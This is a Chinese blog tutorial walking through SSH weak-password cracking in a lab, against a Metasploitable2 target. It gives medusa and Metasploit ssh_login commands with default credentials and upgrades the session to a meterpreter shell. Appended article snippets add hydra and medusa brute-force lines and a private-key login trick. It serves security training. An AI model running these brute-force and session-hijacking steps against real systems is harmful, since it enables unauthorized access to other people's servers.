4.4、漏洞利用-SSH弱口令破解

已于 2024-09-23 10:57:32 修改
阅读量1.7k 收藏 13
点赞数 1
分类专栏: 网络安全训练营 文章标签: 网络安全 ssh
于 2022-09-12 21:17:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zwm_20211031_475/article/details/126822238
版权

目录

4.4、SSH弱口令破解

1、medusa SSH弱口令破解

2、ssh命令行工具登录

3、利用metasploit利用ssh登录反弹shell

4、利用metasploit获取meterpreter shell

5、SSH历史相关漏洞

 

4.4、SSH弱口令破解

1、medusa SSH弱口令破解

medusa(美杜莎)工具

        medusa支持破解的服务类型包括以下类型

medusa -d  //查看medusa支持破解的服务

b8b3390a298cdfdc37fb23ce8191c2ad.png

 查看语法

medusa -h host(-H file)-u username (-U userfile) -p password (-P passfile) -C file -M module

0dba700d802e7879755accff263e863d.png

 

破解原理:ssh服务用户名和密码弱口令

攻击机:kali 192.168.12.128

靶机:metasploitable2 192.168.12.129

medusa -h 192.168.xx.xx -u msfadmin -p msfadmin -M ssh
注释:-h,指定目标主机;-u,用户名;-U,用户字典;
-p,密码;-P,密码字典;-M指定破解服务类型

2cd16c528763ad5a4fc087928f018b6e.png

 

2、ssh命令行工具登录

  ssh 用户名@IP地址

  输入密码即可登录

 

3、利用metasploit利用ssh登录反弹shell

攻击机:kali ip=192.168.12.128
靶机:metasploitable2、IP=192.168.12.129

使用metasploit进行ssh登录,会自动建立对应的bash shell连接。

use auxiliary/scanner/ssh/ssh_login  //使用模块
show options   //查看参数

fc44fee2091df8062933c1e9b00ef9c7.png

set rhosts 192.168.12.129
set username msfadmin
set password msfadmin
run
//设置参数

4c2c41a685d619ae2b43f96ae4afc612.png

sessions -l        //查看连接的会话(shell)

a39eec38b9e7bde99437a24392b95603.png

sessions -i 会话id //连接会话

849f0a58ae79910c3c0dd6b8c6c19f09.png

abdc0f6f2377dfacb3a7c1ff65eeef1c.png

4、利用metasploit获取meterpreter shell

  利用上一步获取的bash shell,注入meterpreter payload,从而获取更强大功能的shell。

sessions -u 会话id  //注入payload

b934ec85eb30f01de407955034e38a3f.png

sessions -l            //查看
sessions -i shell id   //利用shell

8a35c31bb4e3fccb3c1b85f9d7df2ad4.png

894380bd8738265b0310252cb47e1401.png

 

5、SSH历史相关漏洞

OpenSSH CBC模式信息泄露漏洞(CVE-2008-5161)

OpenSSH 安全漏洞(CVE-2017-15906)

OpenSSH 用户枚举漏洞(CVE-2018-15473)

OpenSSH 用户枚举漏洞(CVE-2018-15919)

OpenSSH 双重释放漏洞(CVE-2021-28041)

 

 

 

 

 

 

 

Redis未授权访问漏洞
m0_61506558的博客
09-10 1094
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC未授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
银河麒麟桌面V10-SP1-2303操作系统V10加固手册
最新发布
太极淘的博客
05-10 281
Defaults!通过之前的命令只可更改当前已存在的账户的密码有效期,为了保障以后新建立的账户也可遵循相应的密码有效期规则,需要修改相应的配置文件。default=ignore:若该模块执行出现除成功以外的其他情况(如失败等),则会忽略此模块的结果,继续执行后续的认证模块。success=3:当pam_unix.so模块验证成功时,会跳过接下来的 3 个模块,直接执行之后的认证模块。pam_unix.so:这是 PAM 的一个模块,用于进行传统的 Unix 风格的密码认证。
SSH远程访问控制
ver_mouth__的博客
04-19 1万+
一:SSH概述 1.1什么是SSH SSH (Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登录、远程、复制等功能。SSH协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令,SSH为建立在应用层和传输层基础上的安全协议。 SSH客户端<--------------网络--------------->SSH服务端 数据传输是加密的,可以防止信息泄漏 数据传输是压缩的,可以提高传输速度 1.2SSH的作用 SSH客户端:Putty、 xs
SSH简单爆破及漏洞利用
qq_45947924的博客
09-16 3805
SSH的环境搭建和banner信息获取比较简单,这里我就没有详细说明了,这里主要是讲一下漏洞利用和安全防御。 1.Medusa SSH弱口令破解 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令破解出来就可以使用对应的用户名和密码登录系统。 medusa -h 192.168.0.2 -u root -p 123456 -M ssh #直接输入用户名和密码 medusa -h 192.168.0.2 -u root -P /
弱口令密码
qq_41701460的博客
03-25 1034
指用枚举的方式来爆破用户信息。具体的流程是用事先收集好的数据集成一个字典,然后用字典不断进行枚举,直到枚举成功。
漏洞利用-SSH弱口令破解利用
热门推荐
我是闲人的博客
03-26 1万+
一、 Medusa SSH弱口令破解 密码爆破工具:Medusa(美杜莎) 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么就可以使用对应的密码工具进行暴力破解弱口令。如果设置了非常复杂的话,就算有非常强悍的密码字典文件也没用,毕竟一个个试到猴年马月了。 可以尝试社工。 初级阶段还没学,学到后面再看。。 下面介绍Medusa对指定的ssh服务进行用户名和密码破解。 1. 直接使用用户名和密码字典文件破解 medusa -h IP地址 -u root -P 密码字典文件地址
6-5漏洞利用-SSH弱口令破解利用
山兔的博客
07-03 2042
破解完密码之后,获得对应的用户名,就可以使用ssh客户端软件,进行对应的登录,登录之后,我们就可以做很多的操作,获得shell,在shell当中,就可以执行对应的命令如果在设置SSH服务时,管理员为了方便记忆设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行身份验证暴力破解弱口令,或者是用户名和密码同时破解的这么一个过程。从而获得一些容易猜解出来的这些用户名和密码,破解出来就可以使用对应的用户名和密码登录系统ssh弱口令破解,验证了一句俗语,苍蝇不叮无缝的蛋,我们因为设置
4.5、漏洞利用-SSH安全防御
c10udz的博客
10-02 957
在Linux下可以配置不能使用用户名和密码登录,只是用ssh pgp方式登录,规避ssh暴力破解。修改sshd_config中的PasswordAuthentication 中的yes为no。默认ssh使用用户名和密码进行远程登录,但是也可以使用密钥进行身份验证登录(私钥和公钥)利用iptables对多次连接验证错误,进行账户锁定120s。生成ssh密钥对,使用puttygen。
漏洞利用-SSH安全防御
我是闲人的博客
03-29 6029
一、SSH修改默认端口 默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口。 修改/etc/ssh/ssh_config文件内容。找到Port ,把原来的22修改成想要的端口,一般修改后的端口比较大。 注意:修改之后必须重新启动SSH服务 二、SSH设置PGP登录 默认情况下,SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录(公钥和私钥)。 这里我就使用xshell生成密钥 Xshell生成密钥 打开Xshell,在菜单栏点击“工具”,在弹出的菜单.
ssh远程登录协议和tcp wappers
wulei_123456789的博客
12-07 3078
ssh远程登录协议和tcp wappers 1.SSH服务 1.1 SSH基础 什么是SSH服务器? SSH(Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登录、远程 复制等功能。SSH 协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令,SSH 为建立在应用层和传输层基础上的安全协议。对数据进行压缩,加快传输速度。 SSH客户端<--------------网络---------------->SSH服务端 优点: 数据传输是加密的,可以防止信
Redis未授权访问漏洞复现
Armandhe的博客
06-01 1225
redis未授权访问漏洞的复现、利用条件、防御措施、
WEB安全之:密码穷举破解
f_carey的博客
05-26 3127
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 密码破解1 Hydra1.1 支持的协议1.2 攻击步骤1.3 攻击实例1.4 在线密码破解(了解)2 Metasploit 穷举模块使用3 邮箱破解4 指定后台密码破解4.1 常见 CMS 密码破解4.1.1 CMSmap4.2 一句话密码破解(PHP, JSP, ASP)4.2.1 cheetah4.3 多.
漏洞利用--SSH私钥免密登陆
qq_43757105的博客
08-28 761
在已知对方SSH私钥id_rsa的情况下,可以利用漏洞实现免密登陆,具体操作如下: 1.用kali ping 通对方ip 2.在kali上将获取到的id_rsa的权限提高 chmod 500 id_rsa 3.ssh免密登陆 ssh -i id_rsa 用户名@ip ...
漏洞复现篇:ssh爆破
m0_65615852的博客
04-18 4891
漏洞复现篇:ssh爆破(非常详细的ssh爆破过程)
SSH弱口令爆破服务器
fencecat的博客
08-27 1923
本文使用kali的hydra进行ssh弱口令爆破,获得服务器的用户名和口令,通过 ssh远程登录服务器,并对服务器的登录日志进行了分析,统计了是哪些用户对服务器进行了暴力破解以及暴力破解失败的次数。
ssh免密登陆及其漏洞利用
Cracker's Blog
02-27 4241
ssh 协议是基于 RSA 加密算法才能确保通讯是加密的,可靠的。 0x01:ssh ssh标准格式:ssh -p <port> <user>@192.168.1.1 客户端执行ssh-keygen生成公钥和私钥(保存在用户目录下的.ssh里),如: 将id_rsa.pub内容复制到服务端的/~/.ssh/authorized_keys 或者执行ssh-copy-i...
6-3漏洞利用-SSH环境搭建
山兔的博客
07-01 320
ubuntu下安装对应的ssh服务,需要安装的软件是openssh-server 可以看到安装完成,会在过程当中加载很多内容,下载并进行解包安装打开终端 在之前安装软件进程,没有结束的情况下,我们需要结束该进程,才能使用apt-get,我们也可以选择重启,rebort,干掉之前还在运行的进程以上,我们就完成了openssh-server软件的安装,也就完成了对应服务端的安装,当然服务端软件,不止包括openssh-server,还有其它的软件,可以拿过来使用启动、状态获取、关闭 我们光有服务端也是不能进行
Linux下ssh漏洞利用,【漏洞分析】SSH 命令注入漏洞(CVE-2017-1000117)分析
weixin_39890327的博客
05-13 1725
作者:RickyHao & C1tas@360CERT0x00 背景介绍A malicious third-party can give a crafted “ssh://…” URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the...
4.3、漏洞利用-SSH简介
c10udz的博客
09-12 3736
ssh配置文件sshd_config中新增一行:DebianBanner no,可隐藏操作系统信息。Secure Shell Protocol(安全Shell协议)ssh服务的启动与关闭。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值